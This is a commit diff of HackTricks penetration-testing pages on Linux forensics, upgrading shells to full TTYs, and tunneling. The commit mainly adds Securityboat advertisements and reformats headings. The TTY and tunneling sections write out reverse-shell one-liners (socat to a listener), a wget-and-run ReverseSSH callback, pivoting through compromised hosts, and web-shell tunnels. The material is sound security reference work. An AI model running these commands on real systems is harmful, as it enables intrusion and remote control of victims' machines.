GitBook: [#3195] No subject

This commit is contained in:
CPol 2022-05-08 23:13:03 +00:00 committed by gitbook-bot
parent ae9261cbcf
commit b8b4c413da
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
23 changed files with 519 additions and 281 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 149 KiB

View file

@ -60,12 +60,21 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (13).png>) ![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (13).png>)
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform** **Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
**Bug bounty tip**:**sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
### [SecurityBoat](https://securityboat.in)
![](<.gitbook/assets/SB logo black\_034525.png>)
**Securityboat** is a cybersecurity company focused on providing top of the line **penetration testing services** and the most comprehensive **automated security testing** solutions based on an extensive **manual security testing methodology** that utilizes various case-specific and **industry-tested** solutions. They are committed to providing clear communication on cybersecurity issues, developing solutions, and prioritizing **business risk**.\
**Make the right choice by contacting us for your security:**
{% embed url="https://securityboat.in/contact-us" %}
### [**INE**](https://ine.com) ### [**INE**](https://ine.com)
![](<.gitbook/assets/INE\_Logo (3).jpg>) ![](<.gitbook/assets/INE\_Logo (3).jpg>)

View file

@ -1,4 +1,4 @@
# Linux Forensics
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Initial Information Gathering {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Basic Information ## Initial Information Gathering
### Basic Information
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries: First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
@ -48,7 +54,7 @@ cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
``` ```
### Suspicious information #### Suspicious information
While obtaining the basic information you should check for weird things like: While obtaining the basic information you should check for weird things like:
@ -56,7 +62,7 @@ While obtaining the basic information you should check for weird things like:
* Check **registered logins** of users without a shell inside `/etc/passwd` * Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell * Check for **password hashes** inside `/etc/shadow` for users without a shell
## Memory Dump ### Memory Dump
In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
In order to **compile** it you need to use the **exact same kernel** the victim machine is using. In order to **compile** it you need to use the **exact same kernel** the victim machine is using.
@ -81,14 +87,14 @@ LiME supports 3 **formats**:
LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
## Disk Imaging ### Disk Imaging
### Shutting down #### Shutting down
First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\ First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
### Taking an image of the disk #### Taking an image of the disk
It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information. It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information.
@ -101,7 +107,7 @@ dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<c
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
``` ```
## Disk Image pre-analysis ### Disk Image pre-analysis
Imaging that you receive a disk image with no more data. Imaging that you receive a disk image with no more data.
@ -158,9 +164,9 @@ icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret ThisisTheMasterSecret
``` ```
# Search for known Malware ## Search for known Malware
## Modified System Files ### Modified System Files
Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager. Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager.
@ -172,7 +178,7 @@ dpkg --verify
debsums | grep -v "OK$" #apt-get install debsums debsums | grep -v "OK$" #apt-get install debsums
``` ```
## Malware/Rootkit Detectors ### Malware/Rootkit Detectors
Read the following page to learn about tools that can be useful to find malware: Read the following page to learn about tools that can be useful to find malware:
@ -180,9 +186,9 @@ Read the following page to learn about tools that can be useful to find malware:
[malware-analysis.md](malware-analysis.md) [malware-analysis.md](malware-analysis.md)
{% endcontent-ref %} {% endcontent-ref %}
# Search installed programs ## Search installed programs
## Package Manager ### Package Manager
On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\ On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\
On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems. On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems.
@ -195,7 +201,7 @@ cat /var/log/dpkg.log | grep installed
rpm -qa --root=/ mntpath/var/lib/rpm rpm -qa --root=/ mntpath/var/lib/rpm
``` ```
## Other ### Other
**Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code. **Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code.
@ -213,13 +219,13 @@ find /sbin/ -exec dpkg -S {} \; | grep "no path found"
find /sbin/ exec rpm -qf {} \; | grep "is not" find /sbin/ exec rpm -qf {} \; | grep "is not"
``` ```
# Recover Deleted Running Binaries ## Recover Deleted Running Binaries
![](<../../.gitbook/assets/image (641).png>) ![](<../../.gitbook/assets/image (641).png>)
# Inspect AutoStart locations ## Inspect AutoStart locations
## Scheduled Tasks ### Scheduled Tasks
```bash ```bash
cat /var/spool/cron/crontabs/* \ cat /var/spool/cron/crontabs/* \
@ -235,7 +241,7 @@ cat /var/spool/cron/crontabs/* \
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
``` ```
## Services ### Services
It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries. It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries.
@ -248,11 +254,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser
* _**/etc/systemd/system**_ * _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_ * _**/etc/systemd/system/multi-user.target.wants/**_
## Kernel Modules ### Kernel Modules
On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware. On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware.
## Other AutoStart Locations ### Other AutoStart Locations
There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware. There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware.
@ -260,11 +266,11 @@ There are several configuration files that Linux uses to automatically launch an
* _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ are executed when the specific user logs in. * _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ are executed when the specific user logs in.
* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel. * _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
# Examine Logs ## Examine Logs
Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service. Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service.
## Pure Logs ### Pure Logs
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\ **Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
Interesting system logons: Interesting system logons:
@ -291,7 +297,7 @@ Interesting system logons:
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
{% endhint %} {% endhint %}
## Command History ### Command History
Many Linux systems are configured to maintain a command history for each user account: Many Linux systems are configured to maintain a command history for each user account:
@ -300,7 +306,7 @@ Many Linux systems are configured to maintain a command history for each user ac
* \~/.sh\_history * \~/.sh\_history
* \~/.\*\_history * \~/.\*\_history
## Logins ### Logins
Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\ Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\
It's recommended to check if those logins make sense: It's recommended to check if those logins make sense:
@ -312,7 +318,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/
Note that you can also **take a look to this information reading the logs**. Note that you can also **take a look to this information reading the logs**.
## Application Traces ### Application Traces
* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**/.ssh/authorized\_keys**_ and _**/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts. * **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**/.ssh/authorized\_keys**_ and _**/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts.
* **Gnome Desktop**: User accounts may have a _**/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop. * **Gnome Desktop**: User accounts may have a _**/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop.
@ -321,20 +327,20 @@ Note that you can also **take a look to this information reading the logs**.
* **MySQL**: User accounts may have a _**/.mysql\_history**_ file that contains queries executed using MySQL. * **MySQL**: User accounts may have a _**/.mysql\_history**_ file that contains queries executed using MySQL.
* **Less**: User accounts may have a _**/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less * **Less**: User accounts may have a _**/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less
## USB Logs ### USB Logs
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. [**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list). It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list).
## Installation ### Installation
``` ```
pip3 install usbrip pip3 install usbrip
usbrip ids download #Downloal USB ID database usbrip ids download #Downloal USB ID database
``` ```
## Examples ### Examples
``` ```
usbrip events history #Get USB history of your curent linux machine usbrip events history #Get USB history of your curent linux machine
@ -346,13 +352,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
# Review User Accounts and Logon Activities ## Review User Accounts and Logon Activities
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\ Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
Finally look for accounts with **no passwords** or **easily guessed** passwords. Finally look for accounts with **no passwords** or **easily guessed** passwords.
# Examine File System ## Examine File System
File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\ File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\
**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\ **Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
@ -375,27 +381,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
{% endhint %} {% endhint %}
# Compare files of different filesystem versions ## Compare files of different filesystem versions
### Find added files #### Find added files
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
``` ```
### Find Modified content #### Find Modified content
```bash ```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
``` ```
### Find deleted files #### Find deleted files
```bash ```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
``` ```
### Other filters #### Other filters
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** **`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`**
@ -405,11 +411,17 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil
Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled. Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled.
# References ## References
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -426,5 +438,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Full TTYs
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Full TTY {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Full TTY
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
@ -39,7 +45,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
``` ```
## **Spawn shells** ### **Spawn shells**
* `python -c 'import pty; pty.spawn("/bin/sh")'` * `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')` * `echo os.system('/bin/bash')`
@ -54,7 +60,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
* vi: `:set shell=/bin/bash:shell` * vi: `:set shell=/bin/bash:shell`
* nmap: `!sh` * nmap: `!sh`
# ReverseSSH ## ReverseSSH
A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target. A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.
@ -69,7 +75,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
/dev/shm/reverse-ssh -v -l -p 4444 /dev/shm/reverse-ssh -v -l -p 4444
``` ```
* \(2a\) Linux target: * (2a) Linux target:
```bash ```bash
# Drop it via your preferred way, e.g. # Drop it via your preferred way, e.g.
@ -78,7 +84,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
``` ```
* \(2b\) Windows 10 target \(for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)\): * (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
```bash ```bash
# Drop it via your preferred way, e.g. # Drop it via your preferred way, e.g.
@ -97,7 +103,7 @@ ssh -p 8888 127.0.0.1
sftp -P 8888 127.0.0.1 sftp -P 8888 127.0.0.1
``` ```
# No TTY ## No TTY
If for some reason you cannot obtain a full TTY you **still can interact with programs** that expects user input. In the following example, the password is passed to `sudo` to read a file: If for some reason you cannot obtain a full TTY you **still can interact with programs** that expects user input. In the following example, the password is passed to `sudo` to read a file:
@ -105,7 +111,12 @@ If for some reason you cannot obtain a full TTY you **still can interact with pr
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact' expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
``` ```
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -122,5 +133,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Tunneling and Port Forwarding
<details> <details>
@ -16,18 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# **SSH** {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
SSH graphical connection \(X\) ## **SSH**
SSH graphical connection (X)
```bash ```bash
ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X
``` ```
## Local Port2Port ### Local Port2Port
Open new Port in SSH Server --&gt; Other port Open new Port in SSH Server --> Other port
```bash ```bash
ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere
@ -37,9 +43,9 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in
ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere
``` ```
## Port2Port ### Port2Port
Local port --&gt; Compromised host \(SSH\) --&gt; Third\_box:Port Local port --> Compromised host (SSH) --> Third\_box:Port
```bash ```bash
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
@ -47,18 +53,18 @@ ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_po
sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised> sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised>
``` ```
## Port2hostnet \(proxychains\) ### Port2hostnet (proxychains)
Local Port --&gt; Compromised host \(SSH\) --&gt; Wherever Local Port --> Compromised host (SSH) --> Wherever
```bash ```bash
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy) ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
``` ```
## VPN-Tunnel ### VPN-Tunnel
You need **root in both devices** \(as you are going to create new interfaces\) and the sshd config has to allow root login: You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\
`PermitRootLogin yes` `PermitRootLogin yes`\
`PermitTunnel yes` `PermitTunnel yes`
```bash ```bash
@ -76,13 +82,13 @@ iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE
Set new route on client side Set new route on client side
```text ```
route add -net 10.0.0.0/16 gw 1.1.1.1 route add -net 10.0.0.0/16 gw 1.1.1.1
``` ```
# SSHUTTLE ## SSHUTTLE
You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host. You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\
Example, forwarding all the traffic going to 10.10.10.0/24 Example, forwarding all the traffic going to 10.10.10.0/24
```bash ```bash
@ -90,18 +96,18 @@ pip install sshuttle
sshuttle -r user@host 10.10.10.10/24 sshuttle -r user@host 10.10.10.10/24
``` ```
# Meterpreter ## Meterpreter
## Port2Port ### Port2Port
Local port --&gt; Compromised host \(active session\) --&gt; Third\_box:Port Local port --> Compromised host (active session) --> Third\_box:Port
```bash ```bash
# Inside a meterpreter session # Inside a meterpreter session
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host> portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
``` ```
## Port2hostnet \(proxychains\) ### Port2hostnet (proxychains)
```bash ```bash
background# meterpreter session background# meterpreter session
@ -126,22 +132,22 @@ run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
``` ```
# reGeorg ## reGeorg
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
You need to upload a web file tunnel: ashx\|aspx\|js\|jsp\|php\|php\|jsp You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp
```bash ```bash
python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
``` ```
# Chisel ## Chisel
You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\
You need to use the **same version for client and server** You need to use the **same version for client and server**
## socks ### socks
```bash ```bash
./chisel server -p 8080 --reverse #Server ./chisel server -p 8080 --reverse #Server
@ -149,18 +155,18 @@ You need to use the **same version for client and server**
